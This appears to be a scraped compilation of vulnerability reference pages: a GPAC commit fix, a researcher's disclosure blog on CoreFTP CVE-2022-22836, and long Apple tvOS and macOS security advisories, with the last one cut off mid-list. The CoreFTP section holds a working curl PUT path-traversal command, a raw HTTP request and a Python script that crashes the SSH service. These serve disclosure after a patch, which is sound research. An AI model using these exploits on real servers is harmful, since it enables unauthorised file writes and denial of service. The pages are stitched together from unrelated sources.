The binary MP4Box in Gpac 1.0.1 has a double-free vulnerability in the ilst_box_read function in box_code_apple.c, which allows attackers to cause a denial of service, even code execution and escalation of privileges.

Permalink

Browse files

fixed #1895

*   Loading branch information

![@jeanlf](https://avatars.githubusercontent.com/u/7303785?s=40&v=4)

jeanlf committed

Aug 30, 2021

1 parent 86c1566 commit a69b567b8c95c72f9560c873c5ab348be058f340

Showing with **1 addition** and **0 deletions**.

1.  +1 −0 src/odf/descriptors.c

1 src/odf/descriptors.c

Show comments View file

@@ -1613,6 +1613,7 @@ GF\_AV1Config \*gf\_odf\_av1\_cfg\_read\_bs\_size(GF\_BitStream \*bs, u32 size)

size -= (u32) obu\_size;

}

gf\_av1\_reset\_state(& state, GF\_TRUE);

gf\_bs\_align(bs);

return cfg;

#else

return NULL;

**0 comments on commit `a69b567`**

Please sign in to comment.

CVE-2021-40571: fixed #1895 · gpac/gpac@a69b567

CoreFTP Server before 727 allows directory traversal (for file creation) by an authenticated attacker via ../ in an HTTP PUT request.

![](https://yoursecuritybores.me/content/images/2022/01/CoreFTP-setup-1.png)

**Overview**

The following was found on Core FTP/SFTP Server v2 - Build 725 (64-bit). The following vulnerabilities can be exploited remotely, however one  requires authentication. Although, if anonymous logon is enabled then exploitation of this would be considered unauthenticated. Shodan clocked in ~2,000 publicly available servers. A patch has been released and you can check on their forums to see that the new build version is 727!

![](https://yoursecuritybores.me/content/images/2022/01/image.png)

**Proof of Concept - Arbitrary File Write (HTTPS)**

The application has several different options, so I tried to make it as "real world" as possible. The following was the least amount of access I could set permission. This being that the users home directory is locked to `C:\Temp` locally.

![](https://yoursecuritybores.me/content/images/2021/12/lock.PNG)

Permissions set on the home directory is given access to read and list.

![](https://yoursecuritybores.me/content/images/2021/12/perms.PNG)

With the server started up, an authenticated user can upload files through the HTTPS service with basic authentication. The normal use case for an HTTP file upload is a `POST` request with basic `WebKitFormBoundary` with the file data. Example below;

    POST /?T HTTP/1.1
    Host: 192.168.171.138
    Content-Length: 218
    Cache-Control: max-age=0
    Authorization: Basic am9lOmpvZQ==
    Upgrade-Insecure-Requests: 1
    Origin: https://192.168.171.138
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiULcJSomxAyFsnjd
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: https://192.168.171.138/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    ------WebKitFormBoundaryiULcJSomxAyFsnjd
    Content-Disposition: form-data; name="uploadfile"; filename="random.dat"
    Content-Type: application/octet-stream
    
    Random Data 
    
    ------WebKitFormBoundaryiULcJSomxAyFsnjd--
    

To exploit this vulnerability, escape from the permission lock simply using a `PUT` HTTP verb with a `../` escape sequence. The following `curl` command will successfully bypass the lock permissions;

    curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops
    

More readable format;

    PUT /../whoops HTTP/1.1
    Host: 192.168.171.138
    Content-Length: 4
    Cache-Control: max-age=0
    Authorization: Basic am9lOmpvZQ==
    Upgrade-Insecure-Requests: 1
    Origin: https://192.168.171.138
    Referer: https://192.168.171.138/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    PoC.
    

Notice that the file has been placed outside the locked permission set.

**Proof of Concept - Remote DoS (SSH)**

The next vulnerability was an overflow in the implementation of the SSH Service. During the secure algorithm negotiation, if the client provides an oversized second step, the application will crash.

    import socket
    import codecs
    packet1 = (
    b"\x53\x53\x48\x2d\x32\x2e\x30\x2d\x4e\x6d\x61\x70\x2d\x53\x53\x48"
    b"\x32\x2d\x48\x6f\x73\x74\x6b\x65\x79\x0d\x0a")
    packet2 = (
    b"\x00\x00\x02\x04\x08\x14\xeb\xcd\xde\x26\x3d\x8d\x72\xd2\x0b\xdb"
    b"\xea\x31\x95\x00\x99\x36\x00\x00\x00\xba\x64\x69\x66\x66\x69\x65"
    b"\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72\x6f\x75\x70\x31\x2d"
    b"\x73\x68\x61\x31\x2c\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c"
    b"\x6d\x61\x6e\x2d\x67\x72\x6f\x75\x70\x31\x34\x2d\x73\x68\x61\x31"
    b"\x2c\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d"
    b"\x67\x72\x6f\x75\x70\x31\x34\x2d\x73\x68\x61\x32\x35\x36\x2c\x64"
    b"\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72"
    b"\x6f\x75\x70\x31\x36\x2d\x73\x68\x61\x35\x31\x32\x2c\x64\x69\x66"
    b"\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72\x6f\x75"
    b"\x70\x2d\x65\x78\x63\x68\x61\x6e\x67\x65\x2d\x73\x68\x61\x31\x2c"
    b"\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67"
    b"\x72\x6f\x75\x70\x2d\x65\x78\x63\x68\x61\x6e\x67\x65\x2d\x73\x68"
    b"\x61\x32\x35\x36\x00\x00\x00\x0b\x73\x73\x68\x2d\x65\x64\x32\x35"
    b"\x35\x31\x39\x00\x00\x00\x57\x61\x65\x73\x31\x32\x38\x2d\x63\x62"
    b"\x63\x2c\x33\x64\x65\x73\x2d\x63\x62\x63\x2c\x62\x6c\x6f\x77\x66"
    b"\x69\x73\x68\x2d\x63\x62\x63\x2c\x61\x65\x73\x31\x39\x32\x2d\x63"
    b"\x62\x63\x2c\x61\x65\x73\x32\x35\x36\x2d\x63\x62\x63\x2c\x61\x65"
    b"\x73\x31\x32\x38\x2d\x63\x74\x72\x2c\x61\x65\x73\x31\x39\x32\x2d"
    b"\x63\x74\x72\x2c\x61\x65\x73\x32\x35\x36\x2d\x63\x74\x72\x00\x00"
    b"\x00\x57\x61\x65\x73\x31\x32\x38\x2d\x63\x62\x63\x2c\x33\x64\x65"
    b"\x73\x2d\x63\x62\x63\x2c\x62\x6c\x6f\x77\x66\x69\x73\x68\x2d\x63"
    b"\x62\x63\x2c\x61\x65\x73\x31\x39\x32\x2d\x63\x62\x63\x2c\x61\x65"
    b"\x73\x32\x35\x36\x2d\x63\x62\x63\x2c\x61\x65\x73\x31\x32\x38\x2d"
    b"\x63\x74\x72\x2c\x61\x65\x73\x31\x39\x32\x2d\x63\x74\x72\x2c\x61"
    b"\x65\x73\x32\x35\x36\x2d\x63\x74\x72\x00\x00\x00\x21\x68\x6d\x61"
    b"\x63\x2d\x6d\x64\x35\x2c\x68\x6d\x61\x63\x2d\x73\x68\x61\x31\x2c"
    b"\x68\x6d\x61\x63\x2d\x72\x69\x70\x65\x6d\x64\x31\x36\x30\x00\x00"
    b"\x00\x21\x68\x6d\x61\x63\x2d\x6d\x64\x35\x2c\x68\x6d\x61\x63\x2d"
    b"\x73\x68\x61\x31\x2c\x68\x6d\x61\x63\x2d\x72\x69\x70\x65\x6d\x64"
    b"\x31\x36\x30\x00\x00\x00\x04\x6e\x6f\x6e\x65\x00\x00\x00\x04\x6e"
    b"\x6f\x6e\x65\x00\x00\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41")
    host = ''
    port = 22
    mySocket = socket.socket()
    mySocket.connect((host,port))
    mySocket.send(packet1)
    data = codecs.decode(mySocket.recv(1024))
    print ('Received from server: ' + data)
    mySocket.send(packet2)
    print ('You\'re sending: '+ packet2)
    data = mySocket.recv(1024)
    print ('Received from server: ' + data)
    

Results in the following stack overflow;

![](https://yoursecuritybores.me/content/images/2022/01/overflow.PNG)

**TLDR / Takeaways;**

Some key takeaways and conclusions. First off, CoreFTP team was extremely fast at replying and patching these vulnerabilities and you can update your application so that you're not vulnerable. One thing I noticed after reporting these, CoreFTP seems to have a common theme of DoS vulnerabilities within the TLS implementation for their application, I thought that was kind of interesting.

Secondly, the DoS vulnerability was a pretty short PoC as I just didn't have the time to find the root cause of the vulnerability/ identify the exact point of source code that lead to this. This was a closed boxed research project and the code base is HUGE, trying to reverse it statically was daunting to say the least.

Lastly, this was fun to research, I got to learn about `boofuzz`, and statically reverse with `Binary Ninja Pro`, finally debugged with `WinDBG`. CVE ID's are reported, will update when assigned.

    December 28th, 2021 - Initial Email
    December 29th, 2021 - Response
    Janurary 5th, 2022 - Patched

CVE-2022-22836: CoreFTP Arbitrary File Write(CVE-2022-22836) and Remote DoS

In NetBSD through 9.2, the IPv6 Flow Label generation algorithm employs a weak cryptographic PRNG.

CVE-2021-45489

A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS High Sierra 10.13. An application may be able to execute arbitrary code with elevated privileges.

CVE-2017-13835: About the security content of macOS High Sierra 10.13

This issue was addressed with a new entitlement. This issue is fixed in macOS Mojave 10.14.6, Security Update 2019-004 High Sierra, Security Update 2019-004 Sierra, iOS 12.4, tvOS 12.4. A local user may be able to read a persistent account identifier.

Released July 22, 2019

**Bluetooth**

Available for: Apple TV 4K and Apple TV HD

Impact: An attacker in a privileged network position may be able to intercept Bluetooth traffic (Key Negotiation of Bluetooth - KNOB)

Description: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.

CVE-2019-9506: Daniele Antonioli of SUTD, Singapore, Dr. Nils Ole Tippenhauer of CISPA, Germany, and Prof. Kasper Rasmussen of University of Oxford, England

The changes for this issue mitigate CVE-2020-10135.

Entry added August 13, 2019, updated June 25, 2020

**Core Data**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8646: natashenka of Google Project Zero

**Core Data**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to cause arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2019-8647: Samuel Groß and natashenka of Google Project Zero

**Core Data**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2019-8660: Samuel Groß and natashenka of Google Project Zero

**Game Center**

Available for: Apple TV 4K and Apple TV HD

Impact: A local user may be able to read a persistent account identifier

Description: This issue was addressed with a new entitlement.

CVE-2019-8702: Min (Spark) Zheng and Xiaolong Bai of Alibaba Inc.

Entry added February 24, 2020

**Heimdal**

Available for: Apple TV 4K and Apple TV HD

Impact: An issue existed in Samba that may allow attackers to perform unauthorized actions by intercepting communications between services

Description: This issue was addressed with improved checks to prevent unauthorized actions.

CVE-2018-16860: Isaac Boukris and Andrew Bartlett of the Samba Team and Catalyst

**Image Processing**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted image may lead to a denial of service

Description: A denial of service issue was addressed with improved validation.

CVE-2019-8668: an anonymous researcher

Entry added October 8, 2019

**libxslt**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to view sensitive information

Description: A stack overflow was addressed with improved input validation.

CVE-2019-13118: found by OSS-Fuzz

**Profiles**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to restrict access to websites

Description: A validation issue existed in the entitlement verification. This issue was addressed with improved validation of the process entitlement.

CVE-2019-8698: Luke Deshotels, Jordan Beichler, and William Enck of North Carolina State University; Costin Carabaș and Răzvan Deaconescu of University POLITEHNICA of Bucharest

**Quick Look**

Available for: Apple TV 4K and Apple TV HD

Impact: An attacker may be able to trigger a use-after-free in an application deserializing an untrusted NSDictionary

Description: This issue was addressed with improved checks.

CVE-2019-8662: natashenka and Samuel Groß of Google Project Zero

**Siri**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8646: natashenka of Google Project Zero

**UIFoundation**

Available for: Apple TV 4K and Apple TV HD

Impact: Parsing a maliciously crafted office document may lead to an unexpected application termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8657: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue existed in the handling of document loads. This issue was addressed with improved state management.

CVE-2019-8690: Sergei Glazunov of Google Project Zero

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue existed in the handling of synchronous page loads. This issue was addressed with improved state management.

CVE-2019-8649: Sergei Glazunov of Google Project Zero

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue was addressed with improved state management.

CVE-2019-8658: akayn working with Trend Micro's Zero Day Initiative

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8644: G. Geshev working with Trend Micro's Zero Day Initiative

CVE-2019-8666: Zongming Wang (王宗明) and Zhe Jin (金哲) from Chengdu Security Response Center of Qihoo 360 Technology Co. Ltd.

CVE-2019-8669: akayn working with Trend Micro's Zero Day Initiative

CVE-2019-8671: Apple

CVE-2019-8672: Samuel Groß of Google Project Zero

CVE-2019-8673: Soyeon Park and Wen Xu of SSLab at Georgia Tech

CVE-2019-8676: Soyeon Park and Wen Xu of SSLab at Georgia Tech

CVE-2019-8677: Jihui Lu of Tencent KeenLab

CVE-2019-8678: Anthony Lai (@darkfloyd1014) of Knownsec, Ken Wong (@wwkenwong) of VXRL, Jeonghoon Shin (@singi21a) of Theori, Johnny Yu (@straight\_blast) of VX Browser Exploitation Group, Chris Chan (@dr4g0nfl4me) of VX Browser Exploitation Group, Phil Mok (@shadyhamsters) of VX Browser Exploitation Group, Alan Ho (@alan\_h0) of Knownsec, Byron Wai of VX Browser Exploitation, P1umer of ADLab of Venustech

CVE-2019-8679: Jihui Lu of Tencent KeenLab

CVE-2019-8680: Jihui Lu of Tencent KeenLab

CVE-2019-8681: G. Geshev working with Trend Micro Zero Day Initiative

CVE-2019-8683: lokihardt of Google Project Zero

CVE-2019-8684: lokihardt of Google Project Zero

CVE-2019-8685: akayn, Dongzhuo Zhao working with ADLab of Venustech, Ken Wong (@wwkenwong) of VXRL, Anthony Lai (@darkfloyd1014) of VXRL, and Eric Lung (@Khlung1) of VXRL

CVE-2019-8686: G. Geshev working with Trend Micro's Zero Day Initiative

CVE-2019-8687: Apple

CVE-2019-8688: Insu Yun of SSLab at Georgia Tech

CVE-2019-8689: lokihardt of Google Project Zero

Entry updated September 11, 2019

CVE-2019-8702: About the security content of tvOS 12.4

This issue was addressed with improved entitlements. This issue is fixed in watchOS 6, tvOS 13, macOS Catalina 10.15, iOS 13. An application may be able to gain elevated privileges.

Released September 24, 2019

**AppleFirmwareUpdateKext**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2019-8747: Mohamed Ghannam (@\_simo36)

Entry added October 29, 2019

**Audio**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2019-8706: Yu Zhou of Ant-Financial Light-Year Security Lab

Entry added October 29, 2019

**Audio**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted audio file may disclose restricted memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8850: Anonymous working with Trend Micro Zero Day Initiative

Entry added December 4, 2019

**CFNetwork**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to a cross site scripting attack

Description: This issue was addressed with improved checks.

CVE-2019-8753: Łukasz Pilorz of Standard Chartered GBS Poland

Entry added October 29, 2019

**CoreAudio**

Available for: Apple TV 4K and Apple TV HD

Impact: Playing a malicious audio file may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2019-8592: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

Entry added November 6, 2019

**CoreCrypto**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a large input may lead to a denial of service

Description: A denial of service issue was addressed with improved input validation.

CVE-2019-8741: Nicky Mouha of NIST

Entry added October 29, 2019

**CoreAudio**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted movie may result in the disclosure of process memory

Description: A memory corruption issue was addressed with improved validation.

CVE-2019-8705: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

Entry added October 8, 2019

**Foundation**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8746: natashenka and Samuel Groß of Google Project Zero

Entry added October 29, 2019

**IOUSBDeviceFamily**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8718: Joshua Hill and Sem Voigtländer

Entry added October 29, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to gain elevated privileges

Description: This issue was addressed with improved entitlements.

CVE-2019-8703: an anonymous researcher

Entry added March 16, 2021

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2019-8740: Mohamed Ghannam (@\_simo36)

Entry added October 29, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: A local app may be able to read a persistent account identifier

Description: A validation issue was addressed with improved logic.

CVE-2019-8809: Apple

Entry added October 29, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8712: Mohamed Ghannam (@\_simo36)

Entry added October 29, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to determine kernel memory layout

Description: A memory corruption issue existed in the handling of IPv6 packets. This issue was addressed with improved memory management.

CVE-2019-8744: Zhuo Liang of Qihoo 360 Vulcan Team

Entry added October 29, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2019-8709: derrek (@derrekr6) derrek (@derrekr6)

Entry added October 29, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8717: Jann Horn of Google Project Zero

Entry added October 8, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to determine kernel memory layout

Description: The issue was addressed with improved permissions logic.

CVE-2019-8780: Siguza

Entry added October 8, 2019

**Keyboards**

Available for: Apple TV 4K and Apple TV HD

Impact: A local user may be able to leak sensitive user information

Description: An authentication issue was addressed with improved state management.

CVE-2019-8704: 王 邦 宇 (wAnyBug.Com) of SAINTSEC

**libxml2**

Available for: Apple TV 4K and Apple TV HD

Impact: Multiple issues in libxml2

Description: Multiple memory corruption issues were addressed with improved input validation.

CVE-2019-8749: found by OSS-Fuzz

CVE-2019-8756: found by OSS-Fuzz

Entry added October 8, 2019

**libxslt**

Available for: Apple TV 4K and Apple TV HD

Impact: Multiple issues in libxslt

Description: Multiple memory corruption issues were addressed with improved input validation.

CVE-2019-8750: found by OSS-Fuzz

Entry added October 29, 2019

**mDNSResponder**

Available for: Apple TV 4K and Apple TV HD

Impact: An attacker in physical proximity may be able to passively observe device names in AWDL communications

Description: This issue was resolved by replacing device names with a random identifier.

CVE-2019-8799: David Kreitschmann and Milan Stute of Secure Mobile Networking Lab at Technische Universität Darmstadt

Entry added October 29, 2019

**UIFoundation**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted text file may lead to arbitrary code execution

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2019-8745: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

Entry added October 8, 2019

**UIFoundation**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8831: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

Entry added November 18, 2019

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue was addressed with improved state management.

CVE-2019-8625: Sergei Glazunov of Google Project Zero

CVE-2019-8719: Sergei Glazunov of Google Project Zero

CVE-2019-8764: Sergei Glazunov of Google Project Zero

Entry added October 8, 2019, updated October 29, 2019

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8707: an anonymous researcher working with Trend Micro's Zero Day Initiative, cc working with Trend Micro Zero Day Initiative

CVE-2019-8710: found by OSS-Fuzz

CVE-2019-8726: Jihui Lu of Tencent KeenLab

CVE-2019-8728: Junho Jang of LINE Security Team and Hanul Choi of ABLY Corporation

CVE-2019-8733: Sergei Glazunov of Google Project Zero

CVE-2019-8734: found by OSS-Fuzz

CVE-2019-8735: G. Geshev working with Trend Micro Zero Day Initiative

CVE-2019-8743: zhunki from Codesafe Team of Legendsec at Qi'anxin Group

CVE-2019-8751: Dongzhuo Zhao working with ADLab of Venustech

CVE-2019-8752: Dongzhuo Zhao working with ADLab of Venustech

CVE-2019-8763: Sergei Glazunov of Google Project Zero

CVE-2019-8765: Samuel Groß of Google Project Zero

CVE-2019-8766: found by OSS-Fuzz

CVE-2019-8773: found by OSS-Fuzz

Entry added October 8, 2019, updated October 29, 2019

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A validation issue was addressed with improved logic.

CVE-2019-8762: Sergei Glazunov of Google Project Zero

Entry added November 18, 2019

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved validation.

CVE-2020-9932: Dongzhuo Zhao working with ADLab of Venustech

Entry added July 28, 2020

**Wi-Fi**

Available for: Apple TV 4K and Apple TV HD

Impact: A device may be passively tracked by its Wi-Fi MAC address

Description: A user privacy issue was addressed by removing the broadcast MAC address.

CVE-2019-8854: Ta-Lun Yen of UCCU Hacker and FuriousMacTeam of the United States Naval Academy and the Mitre Cooperation

Entry added December 4, 2019

CVE-2019-8703: About the security content of tvOS 13

A use after free issue was addressed with improved memory management. This issue is fixed in macOS Catalina 10.15.4, Security Update 2020-002 Mojave, Security Update 2020-002 High Sierra. A malicious application may be able to execute arbitrary code with kernel privileges.

Released March 24, 2020

**Accounts**

Available for: macOS Catalina 10.15.3

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9772: Allison Husain of UC Berkeley

Entry added May 21, 2020

**Apple HSSPI Support**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.3

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2020-3903: Proteas of Qihoo 360 Nirvan Team

Entry updated May 1, 2020

**AppleGraphicsControl**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.3

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: Multiple memory corruption issues were addressed with improved state management.

CVE-2020-3904: Proteas of Qihoo 360 Nirvan Team

**AppleMobileFileIntegrity**

Available for: macOS Catalina 10.15.3

Impact: An application may be able to use arbitrary entitlements

Description: This issue was addressed with improved checks.

CVE-2020-3883: Linus Henze (pinauten.de)

**Bluetooth**

Available for: macOS Catalina 10.15.3

Impact: An attacker in a privileged network position may be able to intercept Bluetooth traffic

Description: An issue existed with the use of a PRNG with low entropy. This issue was addressed with improved state management.

CVE-2020-6616: Jörn Tillmanns (@matedealer) and Jiska Classen (@naehrdine) of Secure Mobile Networking Lab

Entry added May 21, 2020

**Bluetooth**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.3

Impact: A malicious application may be able to determine kernel memory layout

Description: A memory corruption issue was addressed with improved validation.

CVE-2020-9853: Yu Wang of Didi Research America

Entry added May 21, 2020

**Bluetooth**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.3

Impact: A local user may be able to cause unexpected system termination or read kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-3907: Yu Wang of Didi Research America

CVE-2020-3908: Yu Wang of Didi Research America

CVE-2020-3912: Yu Wang of Didi Research America

CVE-2020-9779: Yu Wang of Didi Research America

Entry updated September 21, 2020

**Bluetooth**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.3

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2020-3892: Yu Wang of Didi Research America

CVE-2020-3893: Yu Wang of Didi Research America

CVE-2020-3905: Yu Wang of Didi Research America

**Bluetooth**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2019-8853: Jianjun Dai of Qihoo 360 Alpha Lab

**Call History**

Available for: macOS Catalina 10.15.3

Impact: A malicious application may be able to access a user's call history

Description: This issue was addressed with a new entitlement.

CVE-2020-9776: Benjamin Randazzo (@\_\_\_\_benjamin)

**CoreBluetooth**

Available for: macOS Catalina 10.15.3

Impact: A remote attacker may be able to leak sensitive user information

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-9828: Jianjun Dai of Qihoo 360 Alpha Lab

Entry added May 13, 2020

**CoreFoundation**

Available for: macOS Catalina 10.15.3

Impact: A malicious application may be able to elevate privileges

Description: A permissions issue existed. This issue was addressed with improved permission validation.

CVE-2020-3913: Timo Christ of Avira Operations GmbH & Co. KG

**CoreText**

Available for: macOS Catalina 10.15.3

Impact: Processing a maliciously crafted text message may lead to application denial of service

Description: A validation issue was addressed with improved input sanitization.

CVE-2020-9829: Aaron Perris (@aaronp613), an anonymous researcher, an anonymous researcher, Carlos S Tech, Sam Menzies of Sam’s Lounge, Sufiyan Gouri of Lovely Professional University, India, Suleman Hasan Rathor of Arabic-Classroom.com

Entry added May 21, 2020

**CUPS**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.3

Impact: An application may be able to gain elevated privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2020-3898: Stephan Zeisberg (github.com/stze) of Security Research Labs (srlabs.de)

Entry added April 8, 2020

**FaceTime**

Available for: macOS Catalina 10.15.3

Impact: A local user may be able to view sensitive user information

Description: A logic issue was addressed with improved state management.

CVE-2020-3881: Yuval Ron, Amichai Shulman and Eli Biham of Technion - Israel Institute of Technology

**Intel Graphics Driver**

Available for: macOS Catalina 10.15.3

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2020-3886: Proteas

Entry added March 16, 2021

**Intel Graphics Driver**

Available for: macOS Catalina 10.15.3

Impact: A malicious application may disclose restricted memory

Description: An information disclosure issue was addressed with improved state management.

CVE-2019-14615: Wenjian HE of Hong Kong University of Science and Technology, Wei Zhang of Hong Kong University of Science and Technology, Sharad Sinha of Indian Institute of Technology Goa, and Sanjeev Das of University of North Carolina

**IOHIDFamily**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.3

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2020-3919: Alex Plaskett of F-Secure Consulting

Entry updated May 21, 2020

**IOThunderboltFamily**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6

Impact: An application may be able to gain elevated privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2020-3851: Xiaolong Bai and Min (Spark) Zheng of Alibaba Inc. and Luyi Xing of Indiana University Bloomington

**iTunes**

Available for: macOS Catalina 10.15.3

Impact: A malicious application may be able to overwrite arbitrary files

Description: This issue was addressed by removing the vulnerable code.

CVE-2020-3896: Christoph Falta

Entry added March 16, 2021

**Kernel**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.3

Impact: An application may be able to read restricted memory

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2020-3914: pattern-f (@pattern\_F\_) of WaCai

**Kernel**

Available for: macOS Catalina 10.15.3

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: Multiple memory corruption issues were addressed with improved state management.

